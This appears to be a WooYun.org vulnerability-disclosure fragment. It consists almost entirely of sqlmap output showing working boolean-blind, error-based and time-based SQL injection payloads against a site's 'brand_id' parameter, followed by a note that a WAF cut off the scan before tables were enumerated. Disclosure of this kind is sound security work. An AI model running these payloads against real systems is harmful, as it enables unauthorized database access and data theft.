WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: brand_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: brand_id=-7965 OR 7826=7826#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: brand_id=32 AND (SELECT 2932 FROM(SELECT COUNT(*),CONCAT(0x71766b6b
71,(SELECT (ELT(2932=2932,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: brand_id=32 AND (SELECT * FROM (SELECT(SLEEP(5)))CvYa)
---
[18:34:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.35
back-end DBMS: MySQL 5.0
跑太快被waf断了，表名没跑